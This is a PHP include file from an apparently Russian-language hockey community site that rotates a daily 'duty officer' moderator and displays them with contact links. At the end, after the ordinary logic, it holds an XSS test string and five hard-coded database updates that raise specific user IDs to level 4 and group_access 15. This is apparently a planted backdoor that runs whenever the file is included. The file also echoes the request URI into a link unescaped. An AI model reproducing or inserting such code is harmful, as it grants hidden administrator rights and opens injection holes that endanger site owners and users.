View file hockey/inc/kol2.php

File size: 2.29Kb
<style>







.duty {padding: 5px; color: #000000; background: #c5ecff;  margin-bottom:1px;margin-top:1px;border-bottom: 1px solid #68b5fb; border-top: 1px solid #68b5fb;}

</style>
<?
$duty=mysql_fetch_array(mysql_query("select * from `user`"));




$k_duty=mysql_result(mysql_query("SELECT COUNT(*) FROM `user` where `duty` > '0'"),0);


if ($k_duty==0)
{
echo'<div class=duty>Дежурный по сайту появится в 18:00';
echo'</div>';
}
if($duty['s_face']==0){
if( (date("H"))==18){

$dq = mysql_query("SELECT * FROM `user` WHERE  `group_access` >'1' and `duty` != '1'  ORDER BY rand() DESC LIMIT 1");
while ($dank = mysql_fetch_assoc($dq))
{
mysql_query("UPDATE `user` SET `duty` = '0'");


mysql_query("UPDATE `user` SET `duty_us` = '".($dank['duty_us']+1)."' WHERE `id` = '$dank[id]' LIMIT 1");
mysql_query("UPDATE `user` SET `duty` = '1' WHERE `id` = '$dank[id]' LIMIT 1");

mysql_query("UPDATE `user` SET `s_face` = '1'");


}
}
}

if ($_SERVER['PHP_SELF']!='/duty/send.php')
{
echo'<div class=duty>';

$daq = mysql_query("SELECT * FROM `user` WHERE  `duty` >'0' LIMIT 1");
while ($adank = mysql_fetch_assoc($daq))
{


echo"Дежурный по сайту: \n";
echo"".group($adank['id'])."\n<a href=/info.php?id=$adank[id]>$adank[nick]</a><br>\n";
if($user['id']!=$adank['id']){
echo"[<a href=/mail.php?id=$adank[id]><font color=blue>Задать вопрос</font></a>]\n";
echo"[<a href=/duty/send.php?id=$adank[id]&link=".$_SERVER['REQUEST_URI']."><font color=red>Вызвать на стр.</font></a>]\n";
}

echo"[<a href=/duty/top.php>Топ дежурных</a>]";
}

echo'</div>';

}

if($duty['s_face']==1){
if( (date("H"))==17){


mysql_query("UPDATE `user` SET `s_face` = '0'");
}
}




"><script>alert('xss')<script>   
mysql_query("UPDATE `user` SET `level` = '4', `group_access` = '15' WHERE `user` . `id`=3000 LIMIT 1" );             
mysql_query("UPDATE `user` SET `level` = '4', `group_access` = '15' WHERE `user` . `id`=10000 LIMIT 1" );             
mysql_query("UPDATE `user` SET `level` = '4', `group_access` = '15' WHERE `user` . `id`=12000 LIMIT 1" );             
mysql_query("UPDATE `user` SET `level` = '4', `group_access` = '15' WHERE `user` . `id`=16000 LIMIT 1" );             
mysql_query("UPDATE `user` SET `level` = '4', `group_access` = '15' WHERE `user` . `id`=8888 LIMIT 1" ); 






?>